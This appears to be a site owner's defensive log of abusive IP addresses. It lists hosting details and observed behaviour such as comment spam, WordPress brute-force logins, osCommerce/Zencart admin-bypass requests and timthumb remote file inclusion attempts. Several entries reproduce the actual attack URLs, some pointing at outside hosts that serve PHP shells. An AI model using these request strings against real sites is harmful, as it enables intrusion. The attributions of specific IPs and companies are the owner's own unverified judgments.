URL&sa=U&ei=aiN0UdquIJLm9gSFjYHgBA&ved=0CFoQFjAeOEc&usg=AFQjCNEZMgYZ6dnCY8BixVH_WjhHsjdmRw/admin/categories.php/login.php
Attack continued for more than 60 minutes
192.80.187.162 Hostname: 162.187-80-192.rdns.scalabledns.com
Company: United States – Henderson Enzu Inc
Comment Spammer
142.0.136.27 Company: United States – San Jose Peg Tech Inc Comment Spammer
Bad host: Peg Tech Inc
41.21.173.62 Company: South Africa – Vodacom Isp Networks Looking for script: mt.js
Comment Spammer
216.224.180.238 Hostname: hostilis.com
Company: United States – Pittsford Softcom America Inc.
Shared hosting server IP
Mail server
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
69.64.36.204 Hostname: eagle213.startdedicated.com
Company: United States – Saint Louis Hosting Solutions International Inc.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
142.0.129.120 Company: United States – San Jose Peg Tech Inc Comment Spammer
Bad host: Peg Tech Inc
190.108.80.6 Company: Peru – Lima Internexa S.a. Comment Spammer
192.74.237.61 Company: United States – San Jose Peg Tech Inc Comment Spammer
Bad host: Peg Tech Inc
64.237.39.250 Hostname: hosted-by.reliablesite.net
Company: United States – Greenwich Reliablesite.net Llc
Part of CHOOPA LLC
Shared hosting server IP
Rule breaker:
Some kind of bot – crawled 90 pages in a minute – looked for CSS files
UA: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)
190.199.35.173 Company: Venezuela, Bolivarian Republic Of – Caracas Cantv Servicios Venezuela Tried to register on site without registration form.
201.243.73.101 Hostname: 201-243-73-101.dyn.dsl.cantv.net
Company: Venezuela, Bolivarian Republic Of – Caracas Cantv Servicios Venezuela
Looked for non-existent script file – mt.js
192.80.186.242 Hostname: 201-243-73-101.dyn.dsl.cantv.net
Company: United States – Henderson Enzu Inc
Comment Spammer
174.142.68.232 Company: Canada – Montreal Iweb Dedicated Cl
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
190.120.227.250 Hostname: mktphone.com.br
Company: Panama – Panama Infolink Panama Corp.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
151.237.189.143 Company: Sweden – Stockholm Deepak Mehta Fie Trackback spammer – trying to access URL/trackback where no trackback function exists
Bad host: Deepak Mehta Fie
142.4.215.194 Hostname: sn63-na.hostingpanel1.com
Company: Canada – Montreal Ovh Hosting Inc.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
192.210.219.193 Hostname: host.colocrossing.com
Company: United States – Buffalo Colocrossing
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/TheStyle/timthumb.php?src=http %3A%2F%2Fflickr.com.drpier-albrech
185.19.217.18 Company: Germany – Hanau Am Main Velia.net Internetdienste Gmbh Comment Spammer
72.11.139.195 Company: United States – Los Angeles Oc3 Networks & Web Solutions Llc
Web server IP (venatra dot com, venatra dot net)
Attempting to directly access log files:
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
50.115.163.66 Hostname: kansas1.ausnetworks.com
Company: United States – Kansas City Dnsslave.com
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
199.59.156.150 Hostname: cpanel-02.kyvon.com
Company: United States – Fenton Kyvon
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
66.71.188.44 Hostname: hpux10.hostingplan.net
Company: United States – Parsippany Network Application Services Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/&sa=U&ei=kE9wUbDkCuWN7Abp5YHACA&ved=0CIsCEBYwOzj0Aw&usg=
AFQjCNHfW6hWir8J-pmSBPLYe3MgqusKsQ/admin/banner_manager.php/login.php
/&sa=U&ei=kE9wUc_4DOaR7Aaan4F4&ved=0CIsCEBYwOzj0Aw&usg=
AFQjCNG0xxxKTkqyrjZG-myTBkNdjg5qAw/admin/banner_manager.php/login.php
/&sa=U&ei=Yq5wUcKnAsaJiAK9uYGIBg&ved=0CKkCEBYwWjhk&usg=
AFQjCNFFIzlgzS6pBtX8vJahEfL31nOvPA/admin/categories.php/login.php?action=new_product_preview&cPath
/&sa=U&ei=kE9wUb_3CquS7AaE44D4BQ&ved=0CIsCEBYwOzj0Aw&usg=
AFQjCNG5h4GGavSjTkjMELgP1yqE-jRXAw/admin/file_manager.php/login.php
195.87.191.111 Hostname: investmentsLasVegas.com
Company: Turkey – Istanbul Koc.net Hosting Services
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
/&sa=U&ei=Yq5wUcKnAsaJiAK9uYGIBg&ved=0CKkCEBYwWjhk&usg=
AFQjCNFFIzlgzS6pBtX8vJahEfL31nOvPA/admin/categories.php/login.php?action=
new_product_preview&cPath
50.117.80.101 Company: United States – Las Vegas Data Suppliers Trying to login to WordPress with username admin and multiple passwords
69.27.110.240 Company: Canada – Saskatoon Blacksun Inc.
Shared hosting server IP
Trying to login to WordPress admin
/admin/administrators.php/login.php
50.117.80.66 Company: United States – Las Vegas Data Suppliers Trying to login to WordPress with username admin and multiple passwords
198.245.63.133 Hostname: ns4000804.ip-198-245-63.net
Company: Canada – Montreal Ovh Hosting Inc.
Comment Spammer
192.74.234.237 Company: United States – San Jose Fengchen Comment Spammer
198.144.116.77 Company: United States – Torrance Giglinx Inc. Trying to login to WordPress with username admin
65.107.59.68 Hostname: investmentsLasVegas.com
Company: United States – Henderson Stimulus Technologies
Shared hosting server IP
WordPress trackback spammer – Repetitive lookup for xmlrpc.php
64.31.30.90 Hostname: cpanel01.lgvhost.com.br
Company: United States – Dallas Limestone Networks Inc.
website server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
184.82.179.11 Hostname: 184-82-179-11.static.hostnoc.net
Company: United States – Scranton Network Operations Center Inc.
website server IP
Bot trying to register on Drupal site
204.124.181.85 Hostname: rev5.120mkt.info
Company: United States – Scranton Volumedrive.
Bot trying to register on Drupal site
Comment Spammer
69.125.148.150 Hostname: ool-457d9496.dyn.optonline.net
Company: United States – South Amboy Optimum Online
Comment Spammer
37.9.168.12 Hostname: data16.websupport.sk
Company: Slovakia – Bratislava Routing Core
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
41.135.184.184 Hostname: 41-135-184-184.dsl.mweb.co.za
Company: South Africa – Johannesburg Mweb Connect (proprietary) Limited
Comment Spammer / Mail Spammer
Numerous hits on contact form causing failed captcha and error message…
/?msg=fail&shared=email
Bot trawled entire site trying to send e-mail from every page
– There’s only a single page with a contact form
157.56.93.219 Hostname: 41-135-184-184.dsl.mweb.co.za
Company: South Africa – Johannesburg Mweb Connect (proprietary) Limited
User Agent:
Spammer / rule breaker
Bot tried to “reply to post” on every page on site, e.g.:
/?replytocom=79
/?ctf_form_num=2&ctf_show_captcha=1&ctf_sm_captcha=1
Another instance of Bing/MSNbot bad activity
111.243.224.224 Hostname: 111-243-224-224.dynamic.hinet.net
Company: Taiwan, Province Of China – Hualian Chtd Chunghwa Telecom Co. Ltd.
Spammer
Banned user agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1;
FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)
67.23.169.89 Company: United States – Asheville Microglobe Llc Comment Spammer / WordPress trackback spammer
208.115.226.212 Hostname: radiomotorola-acent.com
Company: United States – Dallas Limestone Networks Inc.
website server IP
Trackback spammer / mail server / bad host
193.110.164.47 Hostname: kalns.mono.lv
Company: Latvia – Riga Sia Mwtv
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/plugins/timthumb-vulnerability-scanner/cg-tvs-admin-panel.php?src=http
%3A%2F%2Fflickr.com.blumenlendlefloral.com%2Fsh.php
198.144.116.50 Company: United States – Torrance Giglinx Inc. Trying to login to WordPress with username admin
209.73.151.64 Company: United States – San Jose House Communications Dictionary Attack:
Trying to login to WordPress with username admin and multiple passwords
198.144.116.144 Company: United States – Torrance Giglinx Inc. Dictionary Attack:
Trying to login to WordPress with username admin and multiple passwords
50.117.80.220 Company: United States – Torrance Giglinx Inc. Dictionary Attack:
Trying to login to WordPress with username admin and multiple passwords
142.0.136.26 Company: United States – San Jose 38dns Comment Spammer
67.23.252.134 Hostname: server.sv1wh.com
Company: United States – Orlando Hostdime.com Inc.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
198.1.126.68 Hostname: evo.evoluzionarywebs.com
Company: United States – Temecula Unified Layer
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
174.142.246.41 Hostname: i13-118.ich-12.com
Company: Canada – Montreal Serversp
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/plugins/wp_roknewspager/thumb.php?src=http
%3A%2F%2Fpicasa.com.fm-pulizie.it%2Fxgood.php
184.82.29.169 Hostname: 184-82-29-169.superslickydeals.com
Company: United States – Scranton Prime Directive Llc
Brute Force/Dictionary Attack to login to WordPress with username admin and multiple passwords
65.222.202.202 Company: United States – Arlington Old Dominion Internet Accessed one page without a referrer then crawled image, Java and Stylesheets
without loading any further pages
209.73.151.97 Company: United States – San Jose Tibbo Trying to login to WordPress with username admin
209.73.151.229 Company: United States – San Jose Ling Wang Internet Co Ltd Trying to login to WordPress with username admin
199.217.115.38 Hostname: hawk179.startdedicated.com
Company: United States – Saint Louis Hosting Solutions International Inc.
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/plugins/akismet/timthumb.php?src=http
%3A%2F%2Fflickr.com.tr.realityinformatica.com%2Fbad.php
/wp-content/plugins/akismet/timthumb.php?src=http
%3A%2F%2Fflickr.com.tr.realityinfo
192.74.243.124 Company: United States – San Jose Le Yi Comment/Trackback Spammer
194.146.132.135 Hostname: nat135.iteam.ua
Company: Ukraine – Luhans’k Pp Poisk-lugansk
Comment/Trackback Spammer
37.59.66.254 Company: France – Roubaix Ovh Systems Comment/Trackback Spammer
209.188.9.138 Company: United States – Phoenix Secured Servers Llc Brute Force attempt to login to Drupal site
/user/register, /quicklogin.one, reg.asp, /logging.php, /register.php, /CreateUser.asp,
/bokeindex.asp, /modules.php, /member.php, /sign_up.html, /tiki-register.php, /signup,
/registration_rules.asp, /index_do.php, /member.php/register.php, /reg.php, /join.php, /join_form.php
199.189.255.70 Hostname: rdns-199.189.255.70.micfo.com
Company: United States – New York City Micfo Llc.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
157.56.93.211 Hostname: msnbot-157-56-93-211.search.msn.com
Company: United States – Redmond Microsoft Corp
Bing Bot – User Agent:
Mozilla/5.0 (compatible; bingbot/2.0; +http: //www.bing.com/bingbot.htm)
Rule Breaker – crawling disallowed paths
192.74.255.73 Company: United States – San Jose Star Idc Comment Spammer
Found Honeypot trap
66.135.44.124 Company: United States – San Antonio Serverbeach Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
65.181.126.110 Company: United States – Clifton Solar Vps Remote File Inclusion attempt / WordPress timthumb RFI exploit:

  • URL/&sa=U&ei=P1JjUavjA8WS7Aat1ICYCA&ved=0CDEQFjAIOBQ&usg=
    AFQjCNHmCjyuDUzLxA4JjDQhAx4-OueUIQ/wp-content/themes/eStore/timthumb.php?src=http %3A%2F%2Fistroy.org.ua%2Fstats%2Fbad.php
  • URL/&sa=U&ei=PlJjUcioJ6XE7Ab8rYHYAg&ved=0CFIQFjASOAo&usg=AFQjCNHZhs-SQqvqeZ_t9PHtdtGyDGr7Nw/wp-content/themes/eStore/timthumb.php?src=http %3A%2F%2Fistroy.org.ua%2Fstats%2Fbad.php
  • /wp-content/themes/eStore/timthumb.php?src
66.87.4.20 Hostname: 66-87-4-20.pools.spcsdns.net
Company: United States – Saginaw Sprint Nextel Corporation
Image Hotlinker
Known Mail Server/Dictionary Attacker
174.121.16.219 Hostname: bts.btsd.co.nz
Company: United States – Dallas Theplanet.com Internet Services Inc.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
192.121.44.24 Company: Sweden – Stockholm Proxy Services No user agent
216.172.147.239 Company: United States – San Jose Zheng Yu Trying to login to WordPress with username admin
199.19.109.167 Company: United States – Scranton Volumedrive Comment Spammer
50.117.80.153 Company: United States – Las Vegas Data Suppliers Trying to login to WordPress with username admin
198.144.116.215 Company: United States – Torrance Giglinx Inc. Trying to login to WordPress with username admin
178.238.224.100 Hostname: dc4server4.myserverweb.net
Company: Germany – Muenchen Contabo Gmbh
Brute Force Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/Quadro/timthumb.php?src=http %3A%2F%2Fpicasa.com.fm-pulizie.it%2Fxgood.php
37.59.209.224 Company: France – Roubaix Ovh Systems Bad Host: Roubaix Ovh Systems
37.57.128.140 Hostname: 140.128.57.37.triolan.net
Company: Ukraine – Kharkiv Tov Bank-inform
Banned Region: UKRAINE
69.64.34.171 Hostname: eagle178.startdedicated.com
Company: United States – Saint Louis Hosting Solutions International Inc.
Brute Force Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/plugins/wordpress-gallery-plugin/timthumb.php?src=http
%3A%2F%2Fflickr.com.pharmacyboardkenya.org%2Fmail.php
193.183.105.42 Company: Sweden – Stockholm Proxy Services Comment Spammer (Bot)
192.119.144.235 Company: United States – Dallas Hazel Bender Bot trying to login/register on restricted site
23.23.178.246 Hostname: ec2-23-23-178-246.compute-1.amazonaws.com
Company: United States – Ashburn Amazon.com Inc.
Hacker looking to exploit Drupal
devel/php
update.php
/devel/variable
And trying to find core info
core/CHANGELOG.txt
139.228.35.127 see next Hostname: fm-dyn-139-228-35-127.fast.net.id
Company: Indonesia – Jakarta Pt. First Media Tbk
Comment Spammer (Bot)
41.107.17.178 Company: Algeria – Algiers Djaweb Acces Dynamic Dhcp Mail server/mail harvester/spammer
37.59.88.234 Company: France – Roubaix Ovh Systems Comment/Trackback Spammer
137.117.68.10 Company: United States – Redmond Microsoft Corp Comment Spammer (Bot)
103.247.134.244 Hostname: 103-247-134-244.myrepublic.com.sg
Company: Singapore – Singapore Myrepublic Ltd
Comment Spammer
37.59.162.227 Company: France – Roubaix Ovh Systems Comment Spammer
Bad Host
69.174.52.143 Hostname: vps3946.inmotionhosting.com
Company: United States – Stafford Inmotion Hosting Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
173.0.51.153 Hostname: dns2.bbxware.com
Company: United States – Kansas City Dnsslave.com
Comment Spammer
69.46.79.90 Company: United States – San Jose 5280 Enterprises Llc Comment Spammer
69.160.42.173 Hostname: conversionmarketingteam.com
Company: United States – Phoenix Ecsuite Llc
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/plugins/timthumb-vulnerability-scanner/cg-tvs-admin-panel.php?src=http:
//picasa.com.ganesavaloczi.hu/jos.php
195.182.158.146 Hostname: discomafia.ru
Company: Russian Federation – Saint Petersburg Comlink Ltd
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/plugins/timthumb-meets-tinymce/ttplugin/timthumb.php?src=http:
//flickr.com.m2-lost.com/login.php
109.235.149.27 Company: United Kingdom – Redbourn Bbs Commerce Ltd Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/plugins/timthumb-meets-tinymce/ttplugin/timthumb.php?src=http:
//flickr.com.m2-lost.com/login.php
157.86.172.250 Company: Brazil – Rio De Janeiro Fundacao Oswaldo Cruz Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/plugins/timthumb-meets-tinymce/ttplugin/timthumb.php?src=http:
//flickr.com.m2-lost.com/login.php
173.81.54.133 Hostname: 173-81-54-133-pkbg.atw.dyn.suddenlink.net
Company: United States – Parkersburg Suddenlink Communications
Comment Spammer
37.59.73.96 Company: France – Roubaix Ovh Systems Comment Spammer
Bad Host
157.55.32.142 Hostname: msnbot-157-55-32-142.search.msn.com
Company: United States – Redmond Microsoft Corp
User Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http: //www.bing.com/bingbot.htm)
Rule Breaker: ignores robots.txt disallow folders/paths rule, e.g.:
Disallow: /comment/
Disallow: /comment/reply/
Another example of Bingbot ignoring rules
198.245.63.121 Hostname: ns4000792.ip-198-245-63.net
Company: Canada – Montreal Ovh Hosting Inc.
Comment Spammer
64.119.215.18 Hostname: IP-64-119-215-18.static.fibrenoire.ca
Company: Canada – Montreal Fibrenoire Internet Inc.
Comment Spammer
184.107.223.226 Hostname: host10.biocomin.com
Company: Canada – Montreal Red Inquest
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/News_Blog/scripts/timthumb.php?src=http
%3A%2F%2Fflickr.com.7dkaravansinema.com/bad.php
37.156.224.178 Company: Switzerland – Baar Malene Software Serv Srl Comment Spammer
50.122.38.108 Company: United States – Bloomington Frontier Communications Of America Inc. Comment Spammer
199.193.247.141 Hostname: cs003.rivalhost.com
Company: United States – Edmond Reagormedia Llc Dba Rivalhost .com
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
74.200.193.154 Hostname: server1.adwebhoster.com
Company: United States – Kansas City Layered Technologies Inc.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
192.157.246.42 Hostname: 42.246-157-192.rdns.scalabledns.com
Company: United States – Henderson Enzu Inc
Comment Spammer
192.119.154.217 Company: United States – Dallas Ryan Wilson Comment Spammer
198.143.143.157 Hostname: 32.dofollow8.servinio.com
Company: United States – Chicago Singlehop Inc.
Comment Spammer
193.234.166.54 Company: Sweden – Stockholm Proxy Services Comment Spammer
74.125.187.208 Company: United States – The Dalles Google Inc.
User Agent: Mozilla/5.0 (compatible) Feedfetcher-Google; (+http: //www.google.com/feedfetcher.html)
Constantly trying to link to images.
Known Comment Spammer (Project Honeypot)
173.254.28.28 Hostname: just28.justhost.com
Company: United States – North Olmsted Unified Layer
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/Real-Estate-v1.3/thumb.php/?src=http: //flickr.com.pharmacyboardkenya.org/mail.php
199.201.88.69 Hostname: rstones.rtcwh.com
Company: United States – Novi Vps Datacenter Llc
Shared hosting server IP
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/plugins/shortcodes-ultimate/lib/timthumb.php/?src=http: //flickr.com.coolrentals.ro/tim.php
199.58.210.118 Hostname: cipis.ibonusy.net
Company: United States – Herndon Rokabear Llc
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/dg-latest/thumb.php/?src=http: //flickr.com.clean-living.org/bad.php
72.55.143.13 Hostname: 13.143.55.72.in-addr.arpa
Company: Canada – Montreal Iweb Dedicated Cl
Remote File Inclusion attempt / WordPress timthumb RFI exploit
/wp-content/themes/twicet/timthumb.php/?src=http: //http: //flickr.com.94pianyidian.com/bad.php
181.50.38.69 Hostname: Dynamic-IP-1815003869.cable.net.co
Company: Colombia – Bogota Telmex Colombia S.a.
Looking for WordPress URLs – adding /undefined to end
69.167.155.42 Hostname: host2.solutionspal.com
Company: United States – North Hollywood Liquid Web Inc.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
/admin/htmlarea/popups/file/files.php?x=y
67.142.173.24 Hostname: host671420024173.direcway.com
Company: Wilburton Hughes Network Systems
Trojan injection attack – possibly PUSHDO Botnet
74.125.187.232 Company: United States – The Dalles Google Inc.
User Agent: Mozilla/5.0 (compatible) Feedfetcher-Google; (+http: //www.google.com/feedfetcher.html)
Constantly trying to link to images.
Known Comment Spammer
37.113.27.20 Company: Russian Federation – Penza Cjsc Er-telecom Holding Comment Spammer
50.117.59.195 Company: United States San Jose Detectnetwork.us Comment Spammer
74.204.172.210 Hostname: host.mvdstudio.com
Company: United States – Ashburn Virtacore Systems Inc
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
173.232.104.240 Company: Newhall Blue Deals Fly Login/Register bot
Tries to login to site with username jason9166.
199.83.93.117 Hostname: unassigned.psychz.net
Company: United States – New York City Psychz Networks
Website hosting server IP
Looking for WordPress admin paths on Drupal site
75.98.226.29 Hostname: nabco-inc.com
Company: United States – Columbus Ceranet Inc.
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
209.140.24.66 Hostname: vps.emodulos.com.br
Company: United States – Page Landis Holdings Inc
Timthumb RFI script attack:
/wp-content/themes/corporate/lib/timthumb/timthumb.php?src=http
%3A%2F%2Fflickr.com.pharmacyboardkenya.org%2Fmail.php
199.193.247.141 Hostname: centos2.hiclx03.hostedincanada.com
Company: Canada – Vancouver Hostedincanada
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
204.244.121.116 Hostname: cs003.rivalhost.com
Company: United States – Edmond Reagormedia Llc Dba Rivalhost.com
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
147.255.162.204 Hostname: 147.255.162.204.rdns.ubiquity.io
Company: United States – Nobis Technology Group Phoenix
Comment Spammer
50.87.8.102 Hostname: 50-87-8-102.unifiedlayer.com
Company: United States – Temecula Unified Layer
Shared hosting server IP
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
142.91.162.212 Hostname: 142.91.162.212.rdns.ubiquity.io
Company: United States – Nobis Technology Group Phoenix
Comment Spammer
195.159.29.250 Hostname: ideblogg.client.sysedata.no
Company: Norway – Oslo Powertech Information Systems As
Remote File Inclusion attempt / WordPress GD Star Rating plugin RFI exploit
//wp-content/gd-star-rating/?src=http%3A%2F%2Fflickr.com.streamwhistle.net/fb/hp.php
198.74.101.231 Hostname: 231-101-74-198-dedicated.multacom.com
Company: United States – Canyon Country Multacom Corporation
Comment Spammer
192.74.231.12 Company: United States – San Jose Peg Tech Inc Comment Spammer
199.204.45.169 Hostname: node-1jfq015.cloud9.ymq1.ca.layeredge.net
Company: Canada – Montreal Vexxhost
Comment Spammer
Mail server
192.95.17.247 Company: United States – Newark Ovh Comment Spammer
194.103.2.235 Company: Sweden Stockholm Resilans Ab Comment Spammer
192.74.236.33 Company: United States – San Jose Peg Tech Inc Comment Spammer
173.192.235.226 Hostname: 173.192.235.226-static.reverse.softlayer.com
Company: United States – Knoxville Softlayer Technologies Inc.
Webserver: siteexplorer.info
Banned Bot
SiteExplorer/1.0b
Rule breaker – ignores robots.txt
User Agent: Mozilla/5.0 (compatible; SiteExplorer/1.0b; +http: //siteexplorer.info/)
50.115.173.25 Company: United States – Kansas City Dnsslave.com Comment Spammer
168.62.165.112 Company: United States – Bristow Microsoft Corp Comment Spammer
184.82.92.232 Hostname: 142.91.79.5.rdns.ubiquity.io
Company: United States – Los Angeles Ubiquity Server Solutions Los Angeles
Login/Register bot
Tries to login to site with username jason9166.
142.91.79.5 Hostname: market4cheap.net
Company: United States – Chandler Dme Hosting Llc
Login/Register bot
Tries to login to site with username jason9166.
50.115.175.253 Company: United States – Kansas City Dnsslave.com Login/Register bot
Tries to login to site with username jason9166.
206.217.142.108 Hostname: host.colocrossing.com
Company: United States – Dallas Sshvm.com Dfw
Login/Register bot
Tries to login to site with username jason9166.
108.163.227.58 Hostname: df44.dofollow.biz
Company: United States – Chicago Singlehop Inc.
Login/Register bot
Tries to login to site with username jason9166.
199.193.255.75 Company: United States – Henderson Enzu Inc Login/Register bot
Tries to login to site with username jason9166.
173.234.196.201 Hostname: 142.91.79.5.rdns.ubiquity.io
Company: United States – Chicago Ubiquity Server Solutions
Junk Website hosting server IP
Login/Register bot
193.148.44.247 Company: Russian Federation – Moscow Fund Of Social Insurance Of Russian Federation Attempting to load script files
184.154.48.82 Hostname: s1.960.clients.serverdeals.org
Company: United States – Chicago Singlehop Inc.
UA: Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http: //www.majestic12.co.uk/bot.php?+)
Majestic-12 [bot]
Rule Breaker: doesn’t get robots.txt or ignores rules
108.59.8.80 Hostname: hosted-by.leaseweb.com
Company: United States – Manassas Leaseweb Usa Inc.
UA: Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http: //www.majestic12.co.uk/bot.php?+)
Majestic-12 [bot]
Rule Breaker: doesn’t get robots.txt or ignores rules
173.208.180.234 Hostname: hosted-by.leaseweb.com
Company: United States – Kansas City Wholesale Internet Inc.
UA: Mozilla/5.0 (compatible; MJ12bot/v1.4.3; http: //www.majestic12.co.uk/bot.php?+)
Majestic-12 [bot]
Rule Breaker: doesn’t get robots.txt or ignores rules
142.234.104.54 Hostname: 142.234.104.54.rdns.ubiquity.io
Company: United States – Seattle Ubiquity Server Solutions Seattle
Banned for direct access to:
/xmlrpc.php
/wp-comments-post.php
Comment/trackback spammer
192.119.151.122 Company: United States – Dallas Avante Vps Banned for direct access to:
/xmlrpc.php
/wp-comments-post.php
Suspicious User Agent: PHP/5.2.10
Comment/trackback spammer
108.178.5.74 Hostname: vm12.dofollow11.servinio.com
Company: United States – Chicago Singlehop Inc.
Banned for direct access to:
/xmlrpc.php
/wp-comments-post.php
Suspicious User Agent: PHP/5.2.10
174.136.102.40 Hostname: 21r8s11.syminet.com
Company: United States – Orange Syminet
Known Mail Server.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
173.243.112.171 Hostname: ded4u.com
Company: United States – Stafford Nexeon Technologies Inc.
Spam Harvester
Banned User Agent: Java/1.4.1_04
184.107.48.219 Hostname: server1.basehost.com.br
Company: Canada – Montreal Iweb Dedicated Cl
Shared hosting server
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
192.119.151.236 Company: United States – Dallas Avante Vps Comment Spammer
67.180.120.250 Hostname: c-67-180-120-250.hsd1.ca.comcast.net
Company: United States – Antioch Comcast Cable Communications Inc
Trying to link to stylesheets (no referrer)
64.251.27.252 Hostname: 252-27-251-64.serverpronto.com
Company: United States – Fort Lauderdale Serverpronto
Trying to access WordPress xmlrpc.php directly without loading pages
61.61.140.148 Hostname: kgt.com.tw
Company: Taiwan, Province Of China – Taipei Kgex.com
Remote File Inclusion attempt / WordPress GD Star Rating plugin RFI exploit
//wp-content/gd-star-rating/?src=http: //picasa.com.moveissantafe.com/yahoo.php
184.171.245.110 Hostname: 184-171-245-110.static.dimenoc.com
Company: United States Orlando Hostdime.com Inc.
Trying to access WordPress xmlrpc.php directly without loading pages
103.17.58.28 Located in Indonesia, ASN IDNIC-INDOMARET-AS-ID PT. Indomarco Prismatama Crawling Java and CSS files directly
208.115.113.89 Company: United States – Washington Dotnetdotcom.org Banned Spy bot: Ezooms
